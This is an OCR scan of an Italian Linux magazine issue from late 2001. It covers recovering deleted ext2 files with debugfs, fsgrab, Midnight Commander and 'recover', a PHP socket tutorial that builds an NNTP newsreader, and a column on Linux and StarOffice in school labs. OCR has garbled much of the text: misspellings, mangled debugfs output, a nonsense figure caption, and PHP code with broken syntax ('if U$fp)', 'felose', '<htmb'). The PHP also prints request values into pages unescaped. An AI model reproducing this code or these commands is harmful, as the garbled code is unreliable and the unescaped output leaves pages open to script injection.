Dicembre 2001/Genna:o 2002 


Creazione hard link 


lizzate partizioni aventi si- 
stemi operativi differnenti 
-vd. Microsoft-); 

e scarichiamo da ‘www.pra- 
eclarus.demon.co.uk/tech' 
il programma ‘fsgrab' che 
ci permettera' di leggere i 
dati all'interno della parti- 
zione. 


È possibile utilizzare anche il 
comando ‘dd’: sfortunata- 
mente i tempi d'attesa per 
l'identificazione dell'alloca- 
zione dei dati negli inode so- 
no dilatati causa la natura 
del comando. Dopo aver de- 
compresso il pacchetto ed 
averlo installasto (lanciare 
‘make’ allinterno della direc- 
tory contenete i sorgenti) ba- 
sta lanciare il comando ‘re- 
cover". Indispensabili alcune 
informazioni come: data can- 
cellazione file, grandezza 
approssimativa e directory 
di destinazione. Una volta 
portato a termine il processo 
verra' fatto un 'dump' dei file 


Appond-only | 


Immutable | 


Undeletable 


all'interno della direcoty di 
destinazione (i nomi saranno 
nel formato ‘dumpXX', dove 
'‘XX' identifica, numerica- 
mente, un file dall'altro). 
Consigliabile, utilizzare il 
comando ‘file' per capire 
con che tipo di file stiamo 
agendo: 


file dumpl 
dumpl: Zip archive data, at 
least v2.0 to extract 


DebugFS 


È Necessario identificare gli 
inode rimessi a disposizione 
del filesystem per utilizzi 
successivi (una volta cancel- 
lato un file il posto che que- 
sto occupava viene riallocato 
dal filesystem per utilizzi 
successivi). |l programma 
'debugfs' ci permette di fare 
questo (solitamente conte- 
nuto di default all'interno di 
tutte le distribuzioni), da 
linea di comando digitiamo: 
debugfs /dev /hdc2 (inserire 
la partizione all'interno della 
quale erano contenuti i dati 
cancellati). Abilitiamo la 
scrittura sugli inode utiliz- 
zando l'attributo “w' Per po- 
ter evidenziare gli inode can- 
cellati digitare: /sdel, l'output 


sara' del tipo: 


1566 deleted 
inodes found. 
Inode Owner Mode 
Size Blocks Time deleted 
562817 0 100644 300 1/ 
1 Fri Sep 14 16:40:272001 
562837 O 100644 27372 4/ 
” Fri Sep 14 16:40:27 2001 
562839 0 100644 306 1/ 
1 Fri Sep 14 16:40:27 2001 


debugfs: 


562840 O 100644 
43499 4/ 11 Fri Sep 14 
16:40:27 2001 
1053657 O 100644 
3R537  1/ 8 MonSep 17 
19:20:08 2001 
857612 O 100600 


840 1/ 1MonSep 17 
22:57:08 2001 

857615 O 100600 
342 1/ 1MonSep 17 


22:57:08 2001 


301190 1000 100644 
16555 2/ 5 Wed Sep 19 
22:30:47 ROO1 
301191 1000 100644 
14984 4/ 4 Wed Sep 19 
22:30:47 2001 
301192 1000 100644 
16635 5/ 5 Wed Sep 19 
22:30:47 2001 
301193 1000 100644 
15155 4/ 4 Wed Sep 19 
22:30:47 R001 
301194 1000 100644 
13190 4/ 4 Wed Sep 19 


22:30:47 2001 


Ricordate data e ora in cui il 
disastro e' stato perpetrato? 
No? Non avete speranza di 
riesumare i file se non affi- 
dandovi alla dea bendata. 
Potrebbe facilitare la ricerca 
ricordarsi: dimensione del fi- 
le cancellato, tipo di file, per- 
messi impostati e owner. 
Una volta identificati una 
serie di inode e' possibile 
visionarne i dettagli utilizza- 
no l'opzione 'stat* 


debugfs: stat <100600> 
Inode: 100600 Type: 
regular Mode: 0755 
Flags: 0xO Generation: 
89847 
1000 Group: 100 
Size: 6397088 
File ACL: O Directory ACL: 0 
Links: 1 Blockcount: 12520 
Fragment: Address: 0 
Number: 0 Size: 0 
ctime: 0x3b45a0e8 -- Fri 
Jul 6 13:28:40 2001 
atime: 0x3b45a125 -- Fri 
Jul 6 13:29:41 2001 
mtime: OxSafabef7 -- Thu 
May 10 18:16:55 2001 
BLOCKS: 
(0-11):107365-107376, 
(IND):107377, (12-1035): 
107378-108401, 


User: 


FSGRAB 


device 


Grandezza blocco 
N. blocchi da leggere 


N. blocchi da saltare 


Scrivere su sidout | 


aiuto 


Device default hda 1. 


Figura 6 


Opzioni fsgrab. 


(MIND):108402, CND): 
1084083, (1036-1561): 
108404-108929 
TOTAL: 1565 


Azione diretta 
sugli Inode 


Come accennato all'inizio 
dell'articolo, questa procedu- 
ra e' semplice quanto rischio- 
sa (non dovrebbe essere con- 
siderata procedura normale 
apportare modifiche diretta- 
mente al filesystem). Per gli 
inode da recuperare deve 
essere impostato: un valore 
pari ad 1 per l'usage count 
ed un valore pari a 0 per il 
deletion time. Per fare que- 
sto ricorriamo al comando 
‘mi' (modify inode) di 'de- 
bugfs' (il filesystem deve 
essere montanto in scrittura). 
La procedura e' noisa (si do- 
vranno controllare tutti | 
campi specifici dell'inode) 
ma funzionale. Una volta ul- 
timate le modifiche dovra' 
essere ripristinato il filesy- 
stem: e2fsck -f /dev/hda7 
(l'attributo ‘-f' forza il coman- 
do a controllare il filesystem 
anche se tutto sembra essere 
corretto). Dove andare a cer- 
care i file? Beh, a livello teori- 
co, il filesystem ext2 accor- 
gendosi delle modifiche ap- 
portate, ma non avendo 
all'interno di nessuna direc- 
tory i file riesumati, mostre- 


ra', all'interno della directory 
'lost+ found', nuovamente i 
file (utilizzare il comando ‘file’ 
per identificare gli stessi). Vi 
chiederete: possibile che nes- 
suno abbia mai pensato di 
creare un programma che 
automaticamente riesca a 
recuperare i file cancellati? 
Beh si. Non ci crederete ma 
Midnight Commander (mc) 
fa proprio questo (i presup- 
posti iniziali sul 'montare'/ 
'smontare' le partizioni ri- 
mangono inalterati). Creiamo 
un file di testo: 


echo “sono il piu' bello? 
>/Nome/blackkane/test 


Cancelliamo il file: 


rm /home/blackkane/test 
'Smontiamo!' la partizione 

'home': 
umount /dev/hda” 


Lanciamo il comando 'mc' 
(Midnight Commander) e 

all'interno dell'applicativo 

digitiamo: 


cd undel:/dev/hda 


In risposta ‘mc' restituira' i 
file cancellati: questi saranno 
contrassegnati dal numero 
di inode che conteneva il 
file, contraddistinti da data e 
ora in cui il file e' stato elimi- 
nato. Ordiniamo l'output 
digitando il tasto funzione F9 


(sezione Left) seguito dal 
tast '/' (Listing mode) e da 's' 
(Sort mode -ordinamento 
alafabetico-). È anche pos- 
sibile visionare il contenuto 
del file premendo il tasto 
funzione ‘F3‘. Una volta tro- 
vato il file non rimane che: 


* premere il tasto ‘ins'in 
modo da contrassegnare il 
file perso; 

* generare una directory 
(mkdir /tmp/deletefile); 

* copiare il file contrasse- 
gnato (tasto funzione F5); 

* lasciare 'mc' premendo il 
tasto funzione F70. 


Rimontiamo il nostro device: 
mount /dev/hda? 


Troviamo il file ‘test’ all'inter- 
no della directory ‘împ'‘dele- 
tefile'. Altro tool di recovery 
dei dati interessante è ‘reco- 
ver' (liberamente scaricabile 
all'url ‘recover.sourceforge.- 
net/linux/recover9). Dopo 
aver scaricato/installato il 
programma (attenersi al file 
'‘readme' contenuto all'inter- 
no del pacchetto scaricato) 
ed averlo avviato, sì dovra' 
rispondere alle seguneti do- 
mande: 


* Hard disk device name: 
device contenente i dati 
cancellati; 

* Year of deletion: anno in 
cui i dati sono stati cancel- 
lati (?); 


Recover 


Figura 7 


Campi completamento Recover. 


e Month of deletion: mese 
in cui i dati sono stati can- 
cellati; 

e Weekday of deletion: setti- 
mana in cui sono stati can- 
cellati; 

* First/Last possible day of 
month: definizione di un 
range di giorni; 

e Min/Max possible file size: 
definizione di una range di 
grandezza; 

e Min/Max possible deletion 
hour: definizione di un 
range per le ore; 

e Min/Max possible deletion 
minute: definizione di una 
range per i minuti; 

e User ID of the deleted file: 
ID del file cancellato; 

e A text string the file inclu- 
ded (can be ignored): por- 
zione di testo contenuto 
all'interno del file cancella- 
to. 


‘Recover' risulta essere velo- 

ce e ben strutturato: un 

buon tool da utilizzare qualo- 

ra perdessimo dei dati im- 

portanti. Non resta che au- 

gurarvi un "in bocca al lupo'. 
Francesco Tornieri 
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Recover recover.source- 
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e Midnight Commander 
(man. contenuto all’inter- 
no delle distribuzioni). 


Hard disk device name 
Vear of delation 
Month of delation 
Weekday of delation 
First/Last possible day of month 


Min/Max size/hour/minute 


0000 


Questo mese 
prenderemo in 
esame uno 
degli aspetti più 
interessanti 
dello sviluppo 
di applicazioni 
onentate al 
web: l'utilizzo 
dei socket. 


L'intero funzionamento 
della rete,basata sul 
paradigma 
client/server,si fonda 
sull'utilizzo di questi 
strumenti ,che 
rappresentano 
l'astrazione di un canale 
di comunicazione 
asincrono e bidirezionale 
tra due macchine, 
messo a disposizione 
dal sistema operativo. 
Attraverso questo 
“canale” due computer, 
tramite protocollo 
TCP/IP, possono 
scambiarsi dati sotto 
forma di flussi di byte, 
che saranno poi 
interpretati dai 
programmi che ne 
costituiscono mittente e 
destinatario. 


Primi 


passi 


PHP, impariamo ad 
usare i socket 


costruendo un newsreader 
per il nostro sito 


Dietro ai Socket... 


Come ciò avvenga esula 
dagli obiettivi di questo 
articolo, diremo solamente 
che questo è uno dei com- 
piti del TCP/IP, che realizza 
i livelli di rete e trasporto 
dello schema ISO/OSI ,il 
quale definisce lo stan- 
dard per la connessione 
tra sistemi aperti. 

Quando un programma ha 
bisogno di utilizzare un 
servizio di rete ,immagina- 
te il caso di un browser 
che richiede una pagina a 
un server web,apre un 
socket sulla porta 80 della 
macchina che ospita il ser- 
ver e effettua la sua richie- 
sta, trattando il socket 
come un normale stream 
di input/output,il server 
risponde alla richiesta scri- 
vendo sullo stesso socket 
aperto dal client che atten- 
de la risposta e termina la 
connessione. 

Per meglio comprendere 
questo semplice meccani- 
smo abbiamo realizzato 
come esempio pratico un 
news client via web che 
permette di leggere i mes- 
saggi inviati a un qualsiasi 


newsgroup in rete attra- 
verso una interfaccia posta 
ad esempio sul nostro 
sito. Ogni servizio web 
applica un protocollo stan- 
dard per comunicare con i 
propri client, il protocollo 
che descrive il servizio 
119, cioè il servizio di 
News è definito nell’RFC 
977 scritto nel 1986 da 
Brian Kantor e Phil Lapslay 
e chiamato per l'appunto 
Network News Transfer 
Protocol. Anche se il docu- 
mento è certamente datato 
e descrive l'utilizzo di 
questo protocollo in ambi- 
to dell'ormai famosa 
ARPANET e a detta degli 
stessi autori deriva diretta- 
mente dal protocollo 
NNTP di USENET costitui- 
sce la definizione dell’uni- 
co standard per questo 
servizio. 

Tipicamente un server 
NNTP gira in background 
su un host ,in attesa sulla 
porta 119, e aspetta che 


un client lo interroghi. Una 


volta che un client si colle- 
ga può impartire ordini al 
server tramite diversi 
comandi, vediamone alcu- 
ni che utilizzeremo in 
seguito nel nostro esem- 


pio: 

* list, ottiene una lista dei 
newsgroup presenti sul 
server nel formato: 
group last first p, dove 
group è il nome del 
newsgroup, /ast e first 
sono rispettivamente 
l'indice dell’ ultimo e del 
primo articolo del new- 
sgroup e pè un valore 
booleano ‘n’ 0 ‘y che 
indica se sul newsgroup 
è permesso il posting di 
articoli. 


* group groupname, sele- 
ziona un newsgroup tra 
quelli presenti sul server. 


* head n, restituisce l’hea- 
der dell’n-esimo mes- 
saggio del newsgroup 
precedentemente sele- 
zionato con il comando 
group. (su cosa sia e 
come sia fatto ritornere- 
mo in seguito) 


* body n, restituisce il 
contenuto dell’n-esimo 
messaggio del new- 
sgroup precedentemente 
con il comando group 


Ora vediamo il nostro 
esempio. 


Primi 


Scegliere 
Il server di news 


La prima cosa che la 
nostra interfaccia permet- 
terà di fare è scegliere il 
server di newsda interro- 
gare, ce ne sono diversi 
pubblici e a tema, voi pote- 
te per esempio utilizzare 
quello del vostro ISP. 
Vediamo il contenuto del 
file newsreader.php 


<html> 
<head> 
<title>newsreader</title> 
<style> 
th { background- 
color:#0000FF; 
color:white;} 
</style> 
</head> 
<body> 
<table cellpadding="0" cell- 
spacing="25" align="center" 
width="100%"> 
<tr> 
<th colspan="%8" 
align="center ">newsreader 
</th> 
</tr> 
<tr> 
<td align="right"><b> 
Inserisci il nome del news 
server&enbsp;</b></td> 
<td align="left "><br> 
<form action="newsreader_ 
list.php" method="post"> 
<input type="text" size= 
"20" name="server"> 
<input type="submit" 
value="INVIA "> 
</form> 
</td> 


colspan="2">&nbsp;</th> 
</tr> 

</table> 

</body> 

</html> 


Come vedete è una sempli- 
ce form che invia il nome 
del news server prescelto 
contenuto nella variabile 
$server al file newsrea- 
der_list.php descritto di 


passi 


seguito. 


Scegliamo 
un newsgroup 


<htmb 
<head> 
<title>newsreader_list</title> 
<style> 
th { background- 
color:#0000FF; 
color:white;} 
</style> 
</style> 
</head> 
<body> 
<table cellpadding="0" 
cellspacing="0"align="cen- 
ter" width="100%"> 
<tr> 
<th colspan="2" > 
Newsgroup Presenti 
</th> 
</tr> 
<tr><td>&nbsp;</td></tr> 
<? 
$fp = fsockopen ($server, 
119, $errno, $errstr); 
if U$fp) { 
echo "$errstr 
($errno)<br>\n"; 
} else { 
fgets($fp,4096); 
fputs ($fp, "LIST\r\n\r\n"}); 
fgets($fp,4096); 
while (Ifeof($fp)) { 
$newsgroups=explode(" 
" fgets($fp,4096)); 
> 
<tr><td colspan="2 "><a 
href="newsreader_show- 
group.php?groupname=<?=$n 
ewsgroups[0];?>geser- 
ver=<?=$server?>"><?=$new 
sgroups[0]?></a></td></tr> 
<? 
} 
felose ($fp); 
} 
> 
<tr><td>&nbsp;</td></tr> 
<tr><th>&nbsp;</th></tr> 
</table> 
</body> 
</html> 


La prima istruzione degna 
di nota è fsockopen che 
apre un socket verso il 


server $server, sulla porta 
119 e salva i codici di 
errore, se presenti, nelle 
variabili $errstr e $errno, 
altrimenti restituisce una 
referenza al socket nella 
variabile $fp. 
Successivamente con l’i- 
struzione fgets leggiamo 
la prima stringa inviataci 


Figurar__ 


L'elenco dei newsgroup presenti 


come risposta dal server, 
che in generale è un mes- 
saggio di benvenuto e la 
scartiamo non assegna- 
dola a nessuna variabile. 
Questa istruzione legge al 
massimo 4096 byte oppu- 
re si ferma se la stringa 
letta e più corta ma con- 
tiene un carattere di new 
line ‘\rln” 
Successivamente inviamo 
il comando LIST al server 
con l'istruzione fputs, 
notate la presenza dei 
doppi caratteri di a capo 
al termine del comado 
‘\r\n\r\n° non sono neces- 
sari,ma prescritti dal 
manuale del PHP. 
Successivamente scartia- 
mo la stringa di assenso 
del server tramite un altro 
fgets. 

A questo punto il server 
ci invia il risultato della 
nostra richiesta nel for- 
mato: group last first p 
come descritto in prece- 
denza. 

Il successivo ciclo while 
(!feof($fp)).. legge e for- 
matta questa lista di strin- 
ga, ponendole successi- 


vamente nell’array $new- 
sgroups, il cui primo ele- 
mento contiene il nome 
del newsgroup che viene 
inviato insieme al nome 
del server al prossimo file 
newsreader_showgroup.p 
hp. In Figura 1 vedete il 
risultato dell'esecuzione 
di questo script. 


| messaggi 
del newsgroup 


<htmb> 
<head> 
<title>Untitled</title> 
<style> 
th { background- 
color:#0000FF; 
color:white;} 
</style> 
</head> 
<body> 
<? 
$fp = fsockopen ($server, 
119, $errno, $errstr); 
if (I$fp) { 
echo "$errstr 
($errno)<br>\n"; 
exit; 
} else { 
fgets($fp,4096); 
fputs ($fp, "GROUP 
$groupname\r\n"); 
$response=explode( " 

" fgets($fp,4096)); 
$first=$response[2]; 
$last=$response[3]; 

} 

> 

<table border="1" 
celispacing="0" align="cen- 


0000. 
coco 


CI 
2002 0087 
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ter" width="100%"> 
<tr><th colspan="2">Gruppo 
<?=$groupname?> 
</th><th>messaggi 
<?=$response[1]?></th></tr> 
<tr><td colspan="3"> 
&nbsp;</td></tr> 
<? 
for ($k=$first; 
$kK<=$last;$k++) 


fputs ($fp, "HEAD 
$k\r\n\r\in"); 
while (($line=fgets 
($fp,4096))!=".\r\n") { 
if(ereg("/From:",$line)) 
$from=fline; 
if(ereg("/Date:",$line)) 
$date=$line; 
if(ereg("/Subject:",$line)) 
$subject=$line; 
} 
> 
<tr><td><?=$date?></td><td> 
<?=$from?></td> 
<td><a href= "newsreader_ 
showbody.php?server=<?= 
$server?>&groupname=<?= 
$groupname?>&messageid= 
<?=$k?>"><?=$subject?> 
</a></td></tr> 
<? } 
> 
<tr><td colspan="3"> 
&nbsp;</td></tr> 
<tr><th colspan="3"> 
&nbsp;</th></tr> 
</table> 
</body> 
</htmb 


Dare Wed, 12 Sep 2001 15.170 +0200 


Il server risponde con una 
stringa della forma 
ret_code n_messages first 
last groupname ret_code è 
il codice di ritorno del 
comando group ,n_messa- 
ges è una stima del nume- 
ro di messaggi contenuti 
nel newsgroup, first è l’in- 
dice del primo e /ast quello 
dell'ultimo. 

Poi con un ciclo for, il pro- 
gramma, scorre i messaggi 
dal primo all'ultimo e ne 
richiede l’header al server 
tramite il comando HEAD 
id_messages. 

L'header di un messaggio 
contiene informazioni qua- 
li, il mittente del messag- 
gio,il subject ,la data e l'o- 
ra di invio,il tipo di client 
utilizzato ecc. e termina 
con una riga contenete il 
solo carattere ‘.’ 

Il ciclo while annidato nel 
for cerca in questo header 
che può essere di lunghez- 
za variabile da messaggio 
a messaggio l’autore,il 
subject,e la data. 

Notate l'utilizzo delle fun- 
zioni che operano ricerche 
sulle stringhe tramite la 
definizione di espressioni 
regolari: la funzione 
ereg("*From:",$line) resti- 
tuisce true se la stringa 
$line inizia con la parola 
“From:". 


Tae Wed, 12 Sep 2001 151751 +0200 
Date Wed, 12 Sep 2001 133547 GMT 
ID: Date Wed, 12 Sep 2001 16.2) 26 40200 _ 


(ae Wed. 1259200 


(Due Wed, 12 Sep 2001 14.33 10 GMT 
(Date Wed, 12 Sep 2001 165337 40200 — 
Date Wed, 12 Sep 2001 1531 16 +0000 (UTC) _ 
(Daxe Wed, 12 Sep 2001 153807 GMT 
Date Wed, 12 Sep 2001 15.50.06 GMT 
Dar Wed, 12 Sep 2001 15:50:56 GMT 
(Date Wed, 12 Sep 2001 154256 GMT 


Figura 2 


L'elenco dei messaggi presenti nel newsgroup 


Come prima cosa il pro- 
gramma legge e scarta la 
prima stringa di benvenuto 
del server, poi invia il 
comado GROUP groupna- 
me con il quale seleziona il 
newsgroup selezionato. 
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Recuperate queste infor- 
mazioni per ogni messag- 
gio del newsgroup lo script 
costruisce una riga della 
tabella come vedete in 
Figura 2. 

Il prossimo file newsrea- 


Primi 


der_showbody.php visua- 
lizza invece il contenuto 
del messaggio selezionato 
tramite lo script preceden- 
te. Vediamo il contenuto di 
un messaggio 


passi 


<tr><th>&nbsp;</th></tr> 
<tr><td><?=$body?></td></tr> 
<tr><th>&nbsp;</th></tr> 
</table> 


Imay col appear im the form ol'an X ' you look at tero circles from the side, thy may appear as an X, but from somewhere cise, i may look fke an 2. Îve seen 
these ttangs alphabet scup, and even worse, reductica to mumberi, net reduction to the abrurd but that iritating litie bypotenuse stll makes me crasy i cam 
notte pia peroni riinisizitanizo i gini te square root of 2 11 trapped m a tornado equedistant from the equator #1 be the 
eartbi's fault dlibe earth qualtes after all the faut es, not m cor stars, but im the square root of taro -- That's mce Tenotoy Sutter 

basp flerarw geotites com/Paris/LefBank/2307 


Figura 3 


Il contenuto di un messaggio presente nel newsgroup 


<htmb> 
<head> 
<title>Untitled</title> 
<style> 
th 
{ 
background- 
color:#0000FF; 
color:white; 
} 
</style> 
</head> 
<body> 
<? 
$fp = fsockopen ($server, 
119, $errno, $errstr); 
if (I$fp) 
{ 
echo "$errstr 
($errno)<br>\n"; 


fputs ($fp, "GROUP 
$groupname\r\n\r\n"); 

fgets($fp,4096); 

$response=explode( " 

" fgets($fp,4096)); 
$first=$response[2]; 
$last=$response[3]; 
fputs ($fp, "BODY 

$messageid\r\n\r\n"); 
fgets($fp,4096); 
while (($line=fgets( 
$fp,4096))l=".\r\n") 
{$body.=$line;} 


> 
<table border="1" 
cellspacing="0" align="cen- 
ter" width="100%"> 
<tr><th >Gruppo <?= 
$groupname?> </th></tr> 


Questo semplice script 
effettua la connessione al 
server di news, il comando 
GROUP groupname, sele- 
ziona il newsgroup deside- 
rato,e con il comando 
BODY n_message si richie- 
de il contenuto dell’n-esi- 
mo messaggio, poi lo si 
visualizza come vedete in 
Figura 3. 


Conclusioni 


In questo semplice esem- 
pio avete potuto vedere la 
potenza e la versatilità 
offerte da uno strumento 
come i socket che in prati- 
ca permettono di estende- 
re a nostro piacimento le 
potenzialità dei servizi 
offerti sui nostri siti. 
L'unica nota negativa è la 
scarsa qualità del supporto 
PHP ai socket, le funzioni, 
infatti,spesso non fanno 
quello che promettono, 
basta guardare sul sito 
www.php4.org per vedere i 
commenti poco entusiasti 
di chi li ha utilizzati,ma sia- 
mo sicuri che questi piccoli 
inconvenienti che ora 
devono essere risolti con 
escamotage implementati- 
vi da parte del program- 
matore saranno definitiva- 
mente risolti dal team di 
sviluppo del PHP. 

Antonio Pace 
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Approfondimenti 


Linux nella didattica: 
chi ha detto che non è 
adatto al desktop? 


E Importante che il software libero entri nelle 
scuole italiane. Linux Magazine ci crede 
profondamente. Questo spazio, dedicato 
all'argomento, è il nostro piccolo contributo. 


x 


n questa quinta puntata 
della rubrica dedicata 
all'uso didattico di Linux e 
del software libero vo- 
gliamo provare a sfatare 
una convinzione che sta as- 
sumendo ormai i contorni di 
un "mito" o quantomeno di 
leggenda metropolitana: 
"Linux non è adatto per le 
applicazioni lato client, per 
l'automazione di ufficio e 
per l'uso casalingo da parte 
di utenti non troppo esper- 
ti". Se ciò corrispondesse a 
verità sarebbe arduo o co- 
munque sconsigliabile usare 
la piattaforma GNU/Linux a 
scuola per corsi di tratta- 
mento testi e calcolo dove si 
fa un uso intensivo di pro- 
grammi di videoscrittura e 
di foglio di calcolo. L'espe- 
rienza in corso di svolgi- 
mento presso l'|.P.C. "Besta" 
di Treviso, della quale abbia- 
mo parlato nelle scorse pun- 
tate, dimostra esattamente il 
contrario: si può usare 
tranquillamente la piattafor- 
ma GNU/Linux anche sul 
fronte desktop ricorrendo a 
prodotti come StarOffice 
ottenendo benefici non 
solo "morali" ed economi- 
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Collaborate anche voi scrivendoci a 


limuxmag@edmaster.it. 


ci (e su questi ci siamo più 
volte soffermati nei prece- 
denti articoli http:/www.li- 
nuxdidattica. org/docs/linux- 
magazine/index.phtml) ma 
anche pratici per l'insegnan- 
te, come cercheremo di 
spiegare... 


La centralizzazione 
degli account: 

uno strumento 
indispensabile — 


In un laboratorio scolastico 
basato su piattaforma 
GNU/Linux è di fondamen- 
tale importanza installare un 
sistema per la centralizzazio- 
ne della gestione degli 
account (al Besta si utilizza il 
server NIS- Network 
Information Service) e, nel 
contempo, definire lo spazio 
delle home degli utenti sul 
disco di un'unica macchina 
(che può o non può coinci- 
dere con il server NIS) mon- 
tandolo su tutte le altre sta- 
zioni con NFS (Network File 


System). In questo modo si 
ha il vantaggio di dovere 
definire una sola/volta gli 
utenti, che solitamente sono 
numerosi (con tre o quattro 
classi si arriva comodamen- 
te ad un centinaio di 
account da definire) e che 
cambiano, almeno parzial- 
mente, ogni anno. In più lo 
studente si trova a lavorare 
nello stesso ambiente sia a 
livello di interfaccia che di 
spazio su disco, qualsiasi sia 
la macchina che decide di 
utilizzare. In questo modo 
non occorre più procedere 
al "rito" dell'assegnazione 
dei computer ai singoli stu- 
denti con vincolo di indisso- 
lubilità per tutta la durata 
dell'anno scolastico e si 
evita anche l'inconveniente 
del ragazzo di terza che 
trova il proprio ambiente di 
lavoro completamente stra- 
volto (icone spostate o 
scomparse, sfondo cambia- 
to, file cancellati e tanto 
altro ancora) per colpa del 
compagno "cattivo" di quin- 
ta. A tale proposito giova ri- 
cordare (ma questa non è 
tanto una prerogativa del 
NIS, quanto di un qualsiasi 


sistema operativo "serio") 
che nessuno studente, in un 
laboratorio "Linux" può 
installare software a suo 
piacimento, cancellare file al 
di fuori della propria home 
o comunque danneggiare in 
qualche modo una stazione 
di lavoro, almeno che non 
riesca ad impadronirsi della 
password di root o non col- 
pisca il computer con una 
mazza da baseball... In un 
laboratorio basato su 
Windows 9x, invece, que- 
st'ultima non è indispensa- 
bile per mettere fuori uso la 
stazione di lavoro. 


Perché StarOffice 


Passiamo adesso, più speci- 
ficamente, al software da 
utilizzare per l'attività didat- 
tica inerente il trattamento 
testi ed il calcolo automati- 
co. La soluzione più valida 
in questo ambito è senza 
dubbio StarOffice 5.2 che 
fornisce tutto quello che 
occorre (word processor, 
foglio di calcolo, presenta- 
zioni, browser, client di 
posta, database) ed è libera- 
mente distribuibile a livello 
di eseguibile e gratuito per 
qualsiasi tipo di utilizzo. A 
proposito di questo pacchet- 
to sono però doverose un 
paio di osservazioni: la 
prima è che per avere pre- 
stazioni decenti occorrono 
macchine con 128MB di 
RAM e, anche se la memo- 
ria ormai costa pochissimo, 
non sempre questo è possi- 
bile. Si può allora valutare la 
possibilità di ricorrere all'al- 
ternativa di OpenOffice 
(sotto licenza GPL), che offre 
le stesse funzionalità ma è 
modulare e non monolitico 
e quindi meno affamato di 
risorse, anche se manca 
della versione nazio- 
nalizzata. E' anche im- 
portante segnalare che nei 
prossimi mesi dovrebbe 
uscire la versione 6 di Star- 
Office che avrà novità a 


livello di interfaccia e sarà 
suddiviso in moduli. L'altra 
osservazione riguarda la 
possibilità di usare sia 
StarOffice che OpenOffice 
anche in ambiente Windows 
visto che esistono le versio- 
ni anche per questo sistema 
operativo. Su questo argo- 
mento non vale la pena di 
perdere altro tempo: c'è 
ancora qualcuno che a scuo- 
la insiste ad usare pacchetti 
di office automation proprie- 
tari acquistati a caro prezzo, 
oppure ad agire nell'illega- 
lità con le copie abusive, 
quando esistono alternative 
gratuite che permettono di 
ottenere esattamente gli 
stessi risultati didattici. 


Sembra davvero 
impossibile! 


Agli irriducibili del "si, ma 
fuori dalla scuola tutti usano 
altri prodotti", diciamo anco- 
ra una volta che la scuola 
non deve addestrare all'uso 
di specifici pacchetti, ma 
dare competenze e abilità 
generali utilizzabili in conte- 
sti diversi. In ogni caso, 
anche volendo ragionare in 
termini di operatività imme- 
diata, si sappia che il tempo 
di apprendimento per pas- 
sare da StarOffice ad altri 
software analoghi è stimato 
in trenta minuti. 


Installazione di 
Star0ffice 


Il pacchetto può essere sca- 
ricato dal sito della SUN 
(www.sun.com/staroffice) 
oppure reperito, quasi ogni 
mese, sui cd allegati ad 
alcune riviste. | file da consi- 
derare sono tre: l'eseguibile 
del pacchetto, il player delle 
presentazioni multimediali, 
il database ADABAS. Sia il 
database, che il player non 


sono indispensabili, ma, se 
si installano, è bene farlo 
prima del pacchetto vero e 
proprio per facilitare la con- 
figurazione automatica. Il 
file da lanciare per eseguire 
l'installazione su ogni mac- 
china è so-5_2-ga-bin-linux- 
it.bin /net (INVIO) l'opzione 
/net è fondamentale in 
modo da effettuare l'instal- 
lazione di rete e non quella 
monoutente (su ogni mac- 
china del laboratorio lavora- 
no sicuramente più utenti). Il 
programma chiede dove 
installare il pacchetto, è con- 
sigliabile la directory 
/opt/office52. Terminata l'in- 
stallazione l'utente generico 
deve lanciare nuovamente il 
programma di installazione: 
[pippo@pc pippoJ$ /opt/offi- 
ce52/program/setup (INVIO) 
StarOffice chiede conferma 
sull'installazione tipo da 
adottare: scegliere l'installa- 
zione workstation in modo 
che ogni utente abbia nella 
propria home la directory 
office52, nella quale memo- 
rizzare i propri lavori e per- 
sonalizzare il proprio 
ambiente di lavoro. Se si 
omette l'opzione /net o se al 
momento dell'installazione 
utente non si sceglie work- 
station, ogni utente dovreb- 
be installare nella propria 
home l'intero pacchetto per 
un totale di alcune centinaia 
di Mb. Altri vantaggi dell'u- 
so di StarOffice e della cen- 
tralizzazione degli account. 
A questo punto torna in 
ballo l'importanza del NIS o 
più precisamente dell'uso 
dell'NFS per distribuire a 
tutte la stazioni lo spazio 
delle home directory; infatti 
grazie a questo espediente 
ogni studente ha il proprio 
ambiente "StarOffice" inva- 
riato e protetto su qualsiasi 
macchina lavori. Il pensiero 
va a questo punto ai colle- 
ghi che operano in laborato- 
ri con piattaforme Windows 
9x, e che devono preoccu- 
parsi di dove far salvare i 
lavori degli studenti (oltre 
che di tutti i "pericoli" che 
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l'attività di questi ultimi 
comporta e di cui abbiamo 
accennato in precedenza): 
salviamo su dischetto? Ma 
poi lo studente se lo porta a 
casa e torna iImmancabil- 
mente con l'ultimo virus 
uscito il giorno prima; 
meglio addirittura disattiva- 


Figura [ 


Il laboratorio GNU/Linux del 
Besta con StarOffice in 
"azione". 


re l'uso del lettore di floppy 
dal BIOS... oppure salviamo 
sul disco fisso? Magari nella 
"cartella" (ormai gli utenti 
delle "finestre" non sanno 
più cosa è una directory) 
documenti\classi\2001- 
2002\3A\cognome con l'in- 
conveniente che l'anno suc- 
cessivo quel cognome non 
sarà più nella cartella 3A ma 
in 4A (almeno lo speriamo) 
e comunque rimanendo 
sempre soggetti al pericolo 
di cancellazioni e quindi 
costretti a far copie, backup, 
controlli, tutte cose che sot- 
traggono tempo ed energie 
al lavoro di un insegnante, 
che è ... insegnare. In più 
questi colleghi sfortunati (o i 
tecnici e gli assistenti che 
con essi collaborano) devo- 
no periodicamente ripristi- 
nare l'aspetto del desktop, 
disinstallare i giochi inseriti 
di nascosto dagli studenti, 
ripulire le directory piene di 
immagini scaricate da Inter- 
net e tanto altro ancora. In- 
fine a rendere la situazione 
davvero insostenibile arriva- 


no i virus come W32.NIMDA 
dello scorso settembre che 
ha messo KO vari laboratori 
scolastici (ed in verità anche 
molte organizzazioni non 
scolastiche che era lecito 
attendersi meglio protette). 
Di tutto questo nel laborato- 
rio GNU/Linux del Besta a 
Treviso arrivano solo eco 
lontane; l'impegno più gra- 
voso è stato eliminare gli 
account e le home degli stu- 
denti diplomati lo scorso 
luglio, definire quelli dei 
nuovi studenti e fare per 
questi ultimi l'installazione 
utente di StarOffice. 

Per gli altri studenti non è 
stato necessario fare alcun- 
ché: si sono ritrovati tran- 
quillamente il loro ambiente 
immutato con tutti i lavori 
dell'anno passato ancora 
presenti. 

Del virus poi avremmo letto 
solo sui giornali, se non 
fosse che chi scrive lavora 
anche in un'altra scuola 
dove Linux non è ancora 
fortemente diffuso... 


Conclusioni 


In questo articolo, come si 
sarà notato, non si è mini- 
mamente preso in esame 
l'uso di StarOffice dal punto 
di vista dell'utente finale, 
anche in considerazione del 
